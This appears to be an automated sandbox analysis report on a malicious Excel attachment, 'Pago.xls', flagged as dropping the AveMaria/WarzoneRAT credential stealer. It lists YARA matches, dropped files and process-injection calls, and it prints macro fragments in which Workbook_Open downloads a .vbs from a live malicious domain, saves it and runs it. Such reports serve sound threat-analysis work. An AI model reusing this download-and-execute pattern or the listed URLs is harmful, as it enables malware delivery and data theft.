                Source: wscript.exe, 00000004.00000002.381039566.00000000004E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380806996.00000000003AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381024749.00000000003AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380792890.000000000037F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380778563.00000000003B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380833098.00000000037DF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381013256.0000000000367000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381085396.00000000037C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380774855.0000000003791000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380781714.00000000003B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380781714.000000000039C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381085396.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380789851.000000000038C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381004966.000000000032B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380800231.00000000003B8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380708506.00000000037AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000003.380743816.00000000037C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgx
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfx
                Source: wscript.exe, 00000004.00000003.380813265.0000000000358000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjq
                Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.com/ww
                Source: wscript.exe, 00000004.00000003.380914129.0000000000353000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.381010920.0000000000353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stipamana.s
                Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: NXRWIG.exe, 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_094bb4af-8

                E-Banking Fraud

                barindex
                Yara detected AveMaria stealer
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
                Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
                Document contains an embedded VBA macro with suspicious strings
                Source: Pago.xlsOLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String wscript: Set WshShell = CreateObject("WScript.Shell")Name: Workbook_Open
                Source: .doc.4.drOLE, VBA macro line: Set WshShell = CreateObject("WScript.Shell")
                Document contains an embedded VBA with functions possibly related to ADO stream file operations
                Source: Pago.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IXMLHTTPRequest.Open("get","https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbs",False)Name: Workbook_Open
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API Stream.Open()Name: Workbook_Open
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API Stream.Write(??????????\xfffd?????????????\xfffd??????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd????????????????????????\xfffd?????\xfffd????????????????????????\xfffd??????\xfffd??????\xfffd???????????\xfffd?????\xfffd??????\xfffd?????\xfffd???????????\xfffd????????????????????????\xfffd???????????????????????????\xfffd?????????????????????????????????????\xfffd?????????????\xfffd?????\xfffd????????????????????????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd????????????\xfffd??????\xfffd?????????????????\xfffd??????????????????????????????????????\xfffd????????????\xfffd?????\xfffd?????\xfffd??????????????????\xfffd??????\xfffd??????\xfffd?????\xfffd?????\xfffd?????\xfffd?????\xfffd????????????????????????\xfffd?????\xfffd????????????\xfffd?????????????????????????\xfffd??????????????????????????????\xfffd????????????????????????\xfffd????????????????????????????????????????????\xfffd??????\xfffd??????\xfffd??????\xfffd??????????????????\xfffd???????????\xfffd????????????????????????\xfffd??????\xfffd??????\xfffd??????\xfffd??????\xfffd??????\xfffd??????????????????\xfffd????????????\xfffd????????????\xfffd?????????????????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd????????????\xfffd?????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd?????\xfffd???????????????????\xfffd????????????????????????\xfffd????????????????????????????????\xfffd?????\xfffd??????\xfffd??????\xfffd?????????????????????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd?????\xfffd???????????\xfffd????????????\xfffd?????\xfffd??????\xfffd???????????????????\xfffd????????????\xfffd?????????????????????????????????????????????????????????\xfffd??????????????????????????????????????????????\xfffd????????????????????????\xfffd?????\xfffd??????????????????\xfffd??????????\xfffd????????????\xfffd?????\xfffd??????\xfffd??????\xfffd?????\xfffd?????\xfffd?????\xfffd?????\xfffd???????????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd???????????\xfffd??????\xfffd??????????????????\xfffd??????\xfffd???????????????????????????????????????\xfffd??????\xfffd?????\xfffd?????\xfffd?????\xfffd??????\xfffd?????\xfffd??????\xfffd?????\xfffd??????\xfffd??????\xfffd??????\xfffd?????\xfffd??????\xfffd??????\xfffd?????\xfffd????????????\xfffd?????????????????????????\xfffd?????????????????????????\xfffd????????????\xfffd??????\xfffd??????\xfffd???????????\xfffd????????????????????????????????????????????????????????????????????????????????\xfffd?????\xfffd????????????\xfffd?????\xfffd????????????????????????????????????????????\xfffd??????\xfffd?????\xfffd???????????????????\xfffd???????????\xfffd?????\xfffd?????????????\xfffd?????\xfffd???????????????????\xfffd????????????\xfffd??????????????????????????????????????\xfffd???????????\xfffd?????????????????????????????????????\xfffd????????????\xfffd?????????????\xfffd?????????????????\xfffd?????\xfffd???????????\xfffd?????\xfffd????????????\Name: Workbook_Open
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, API IShellDispatch6.Open("C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs")Name: Workbook_Open
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, found possibly 'ADODB.Stream' functions open, savetofile, writeName: Workbook_Open
                Source: Pago.xls.0.drStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Source: 57230000.0.drStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Source: .doc.4.drStream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
                Document contains an embedded VBA with functions possibly related to HTTP operations
                Source: Pago.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, sendName: Workbook_Open
                Source: Pago.xls.0.drStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Source: 57230000.0.drStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Source: .doc.4.drStream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
                Document contains an embedded VBA with hexadecimal encoded strings
                Source: Pago.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function \xa8\xa3\xa2\xa3\xb0\xa9\xae\xa9\xb9\xae\xaf\xa5\xa3\xa1\xa6\xb9\xae\xbd\xb4\xa7\xa5\xb7\xa7\xa4\xb4\xba\xa8\xa1\xa8\xbf\xb0\xbd\xbd\xa2\xac\xa2\xaa\xa8\xb7\xa8\xa2\xa5\xb6\xb5\xae\xa1\xbe\xba\xb8\xbe\xa6\xb3\xbf\xb8\xbd\xa4\xa7\xbb\xbc\xb0\xbc\xbf\xaa\xbe\xb3\xb8\xb8\xb7\xba\xa7\xa3\xb2\xac\xa4\xa5\xb5\xb7\xb9\xb4\xac\xa3\xa7\xbe\xb4\xb5\xaf\xb3\xb6\xbe\xbc\xb2\xb9\xa6, String ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5
                Source: Pago.xls.0.drStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
                Source: 57230000.0.drStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
                Source: .doc.4.drStream path 'Macros/VBA/ThisDocument' : found hex strings
                Microsoft Office drops suspicious files
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cfhxdfhgjsxgfhxz[1].vbsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbsJump to behavior
                Office process drops PE file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeJump to dropped file
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_00385470 NtSetContextThread,8_2_00385470
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003850F8 NtResumeThread,8_2_003850F8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_00385318 NtWriteVirtualMemory,8_2_00385318
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_00384FC8 NtReadVirtualMemory,8_2_00384FC8
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_00385469 NtSetContextThread,8_2_00385469
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_00384FC1 NtReadVirtualMemory,8_2_00384FC1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_0038722E8_2_0038722E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_0038180F8_2_0038180F
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003810718_2_00381071
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003812588_2_00381258
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003808488_2_00380848
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003834AF8_2_003834AF
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003846F08_2_003846F0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_00387EC08_2_00387EC0
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003841108_2_00384110
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003815898_2_00381589
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_0038083A8_2_0038083A
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003846E28_2_003846E2
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeCode function: 8_2_003841048_2_00384104
                Source: Pago.xlsOLE, VBA macro line: Private Sub Workbook_Open()
                Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
                Source: Pago.xls.0.drOLE, VBA macro line: Private Function JbxHook_Open_0__ob(jbxline, ByRef jbxthis)
                Source: Pago.xls.0.drOLE, VBA macro line: Static jbxtresh_Open as Integer
                Source: Pago.xls.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.drOLE, VBA macro line: JbxHook_Open_0__ob = jbxthis.Open
                Source: Pago.xls.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: Pago.xls.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_0__ob
                Source: Pago.xls.0.drOLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
                Source: Pago.xls.0.drOLE, VBA macro line: Static jbxtresh_Open as Integer
                Source: Pago.xls.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.drOLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
                Source: Pago.xls.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: Pago.xls.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
                Source: Pago.xls.0.drOLE, VBA macro line: Private Function JbxHook_Open_3__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
                Source: Pago.xls.0.drOLE, VBA macro line: Static jbxtresh_Open as Integer
                Source: Pago.xls.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.drOLE, VBA macro line: JbxHook_Open_3__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
                Source: Pago.xls.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: Pago.xls.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: Pago.xls.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob
                Source: Pago.xls.0.drOLE, VBA macro line: Private Sub Workbook_Open()
                Source: Pago.xls.0.drOLE, VBA macro line: JbxHook_Open_3__ob 35, , "get", ("h://www.m.m/gdhjhdjhdgj/hgdhgjwqwgwwg/vbjzbdkjbgzkldbg/hdhgjghz.vb"), False
                Source: Pago.xls.0.drOLE, VBA macro line: JbxHook_Open_0__ob 40,
                Source: Pago.xls.0.drOLE, VBA macro line: JbxHook_Open_1__ob 46, , ()
                Source: 57230000.0.drOLE, VBA macro line: Private Function JbxHook_Open_0__ob(jbxline, ByRef jbxthis)
                Source: 57230000.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: 57230000.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.drOLE, VBA macro line: JbxHook_Open_0__ob = jbxthis.Open
                Source: 57230000.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: 57230000.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_0__ob
                Source: 57230000.0.drOLE, VBA macro line: Private Function JbxHook_Open_1__ob(jbxline, ByRef jbxthis, ByRef jbxparam0)
                Source: 57230000.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: 57230000.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.drOLE, VBA macro line: JbxHook_Open_1__ob = jbxthis.Open(jbxparam0)
                Source: 57230000.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: 57230000.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob
                Source: 57230000.0.drOLE, VBA macro line: Private Function JbxHook_Open_3__ob(jbxline, ByRef jbxthis, ByRef jbxparam0, ByRef jbxparam1, ByRef jbxparam2)
                Source: 57230000.0.drOLE, VBA macro line: Static jbxtresh_Open As Integer
                Source: 57230000.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.drOLE, VBA macro line: JbxHook_Open_3__ob = jbxthis.Open(jbxparam0, jbxparam1, jbxparam2)
                Source: 57230000.0.drOLE, VBA macro line: If jbxtresh_Open < 200 Then
                Source: 57230000.0.drOLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
                Source: 57230000.0.drOLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_3__ob
                Source: 57230000.0.drOLE, VBA macro line: Private Sub Workbook_Open()
                Source: 57230000.0.drOLE, VBA macro line: JbxHook_Open_3__ob 35, , "get", ("h://www.m.m/gdhjhdjhdgj/hgdhgjwqwgwwg/vbjzbdkjbgzkldbg/hdhgjghz.vb"), False
                Source: 57230000.0.drOLE, VBA macro line: JbxHook_Open_0__ob 40,
                Source: 57230000.0.drOLE, VBA macro line: JbxHook_Open_1__ob 46, , ()
                Source: .doc.4.drOLE, VBA macro line: Private Sub Document_Close()
                Source: Pago.xlsOLE indicator, VBA macros: true
                Source: Pago.xls.0.drOLE indicator, VBA macros: true
                Source: 57230000.0.drOLE indicator, VBA macros: true
                Source: .doc.4.drOLE indicator, VBA macros: true
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                Source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                Source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
